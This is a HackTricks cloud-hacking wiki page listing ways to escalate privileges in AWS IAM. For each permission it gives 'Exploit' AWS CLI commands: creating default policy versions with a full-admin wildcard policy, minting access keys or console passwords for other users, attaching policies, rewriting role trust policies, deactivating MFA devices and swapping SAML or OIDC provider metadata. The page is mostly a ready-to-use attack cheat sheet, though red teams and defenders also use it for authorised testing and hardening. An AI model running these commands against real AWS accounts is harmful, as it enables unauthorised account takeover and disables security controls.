# AWS - IAM Privesc
{% hint style="success" %}
Learn & practice AWS Hacking: (1) (1) (1).png)
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking:  (1).png)
[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
## IAM
For more info about IAM check:
{% content-ref url="../aws-services/aws-iam-enum.md" %}
[aws-iam-enum.md](../aws-services/aws-iam-enum.md)
{% endcontent-ref %}
### **`iam:CreatePolicyVersion`**
Grants the ability to create a new IAM policy version, bypassing the need for `iam:SetDefaultPolicyVersion` permission by using the `--set-as-default` flag. This enables defining custom permissions.
**Exploit Command:**
```bash
aws iam create-policy-version --policy-arn \
--policy-document file:///path/to/administrator/policy.json --set-as-default
```
**Impact:** Directly escalates privileges by allowing any action on any resource.
### **`iam:SetDefaultPolicyVersion`**
Allows changing the default version of an IAM policy to another existing version, potentially escalating privileges if the new version has more permissions.
**Bash Command:**
```bash
aws iam set-default-policy-version --policy-arn --version-id v2
```
**Impact:** Indirect privilege escalation by enabling more permissions.
### **`iam:CreateAccessKey`**
Enables creating access key ID and secret access key for another user, leading to potential privilege escalation.
**Exploit:**
```bash
aws iam create-access-key --user-name
```
**Impact:** Direct privilege escalation by assuming another user's extended permissions.
### **`iam:CreateLoginProfile` | `iam:UpdateLoginProfile`**
Permits creating or updating a login profile, including setting passwords for AWS console login, leading to direct privilege escalation.
**Exploit for Creation:**
```bash
aws iam create-login-profile --user-name target_user --no-password-reset-required \
--password ''
```
**Exploit for Update:**
```bash
aws iam update-login-profile --user-name target_user --no-password-reset-required \
--password ''
```
**Impact:** Direct privilege escalation by logging in as "any" user.
### **`iam:UpdateAccessKey`**
Allows enabling a disabled access key, potentially leading to unauthorized access if the attacker possesses the disabled key.
**Exploit:**
{% code overflow="wrap" %}
```bash
aws iam update-access-key --access-key-id --status Active --user-name
```
{% endcode %}
**Impact:** Direct privilege escalation by reactivating access keys.
### **`iam:CreateServiceSpecificCredential` | `iam:ResetServiceSpecificCredential`**
Enables generating or resetting credentials for specific AWS services (e.g., CodeCommit, Amazon Keyspaces), inheriting the permissions of the associated user.
**Exploit for Creation:**
{% code overflow="wrap" %}
```bash
aws iam create-service-specific-credential --user-name --service-name
```
{% endcode %}
**Exploit for Reset:**
{% code overflow="wrap" %}
```bash
aws iam reset-service-specific-credential --service-specific-credential-id
```
{% endcode %}
**Impact:** Direct privilege escalation within the user's service permissions.
### **`iam:AttachUserPolicy` || `iam:AttachGroupPolicy`**
Allows attaching policies to users or groups, directly escalating privileges by inheriting the permissions of the attached policy.
**Exploit for User:**
```bash
aws iam attach-user-policy --user-name --policy-arn ""
```
**Exploit for Group:**
```bash
aws iam attach-group-policy --group-name --policy-arn ""
```
**Impact:** Direct privilege escalation to anything the policy grants.
### **`iam:AttachRolePolicy`,** ( `sts:AssumeRole`|`iam:createrole`) | **`iam:PutUserPolicy` | `iam:PutGroupPolicy` | `iam:PutRolePolicy`**
Permits attaching or putting policies to roles, users, or groups, enabling direct privilege escalation by granting additional permissions.
**Exploit for Role:**
```bash
aws iam attach-role-policy --role-name --policy-arn ""
```
**Exploit for Inline Policies:**
```bash
aws iam put-user-policy --user-name --policy-name "" \
--policy-document "file:///path/to/policy.json"
aws iam put-group-policy --group-name --policy-name "" \
--policy-document file:///path/to/policy.json
aws iam put-role-policy --role-name --policy-name "" \
--policy-document file:///path/to/policy.json
```
You can use a policy like:
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": [
"*"
]
}
]
}
```
**Impact:** Direct privilege escalation by adding permissions through policies.
### **`iam:AddUserToGroup`**
Enables adding oneself to an IAM group, escalating privileges by inheriting the group's permissions.
**Exploit:**
{% code overflow="wrap" %}
```bash
aws iam add-user-to-group --group-name --user-name
```
{% endcode %}
**Impact:** Direct privilege escalation to the level of the group's permissions.
### **`iam:UpdateAssumeRolePolicy`**
Allows altering the assume role policy document of a role, enabling the assumption of the role and its associated permissions.
**Exploit:**
```bash
aws iam update-assume-role-policy --role-name \
--policy-document file:///path/to/assume/role/policy.json
```
Where the policy looks like the following, which gives the user permission to assume the role:
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "sts:AssumeRole",
"Principal": {
"AWS": "$USER_ARN"
}
}
]
}
```
**Impact:** Direct privilege escalation by assuming any role's permissions.
### **`iam:UploadSSHPublicKey` || `iam:DeactivateMFADevice`**
Permits uploading an SSH public key for authenticating to CodeCommit and deactivating MFA devices, leading to potential indirect privilege escalation.
**Exploit for SSH Key Upload:**
```bash
aws iam upload-ssh-public-key --user-name --ssh-public-key-body
```
**Exploit for MFA Deactivation:**
```bash
aws iam deactivate-mfa-device --user-name --serial-number
```
**Impact:** Indirect privilege escalation by enabling CodeCommit access or disabling MFA protection.
### **`iam:ResyncMFADevice`**
Allows resynchronization of an MFA device, potentially leading to indirect privilege escalation by manipulating MFA protection.
**Bash Command:**
```bash
aws iam resync-mfa-device --user-name --serial-number \
--authentication-code1 --authentication-code2
```
**Impact:** Indirect privilege escalation by adding or manipulating MFA devices.
### `iam:UpdateSAMLProvider`, `iam:ListSAMLProviders`, (`iam:GetSAMLProvider`)
With these permissions you can **change the XML metadata of the SAML connection**. Then, you could abuse the **SAML federation** to **login** with any **role that is trusting** it.
Note that doing this **legit users won't be able to login**. However, you could get the XML, so you can put yours, login and configure the previous back
```bash
# List SAMLs
aws iam list-saml-providers
# Optional: Get SAML provider XML
aws iam get-saml-provider --saml-provider-arn
# Update SAML provider
aws iam update-saml-provider --saml-metadata-document --saml-provider-arn
## Login impersonating roles that trust the SAML provider
# Optional: Set the previous XML back
aws iam update-saml-provider --saml-metadata-document --saml-provider-arn
```
{% hint style="info" %}
TODO: A Tool capable of generating the SAML metadata and login with a specified role
{% endhint %}
### `iam:UpdateOpenIDConnectProviderThumbprint`, `iam:ListOpenIDConnectProviders`, (`iam:`**`GetOpenIDConnectProvider`**)
(Unsure about this) If an attacker has these **permissions** he could add a new **Thumbprint** to manage to login in all the roles trusting the provider.
{% code overflow="wrap" %}
```bash
# List providers
aws iam list-open-id-connect-providers
# Optional: Get Thumbprints used to not delete them
aws iam get-open-id-connect-provider --open-id-connect-provider-arn
# Update Thumbprints (The thumbprint is always a 40-character string)
aws iam update-open-id-connect-provider-thumbprint --open-id-connect-provider-arn --thumbprint-list 359755EXAMPLEabc3060bce3EXAMPLEec4542a3
```
{% endcode %}
## References
* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
{% hint style="success" %}
Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}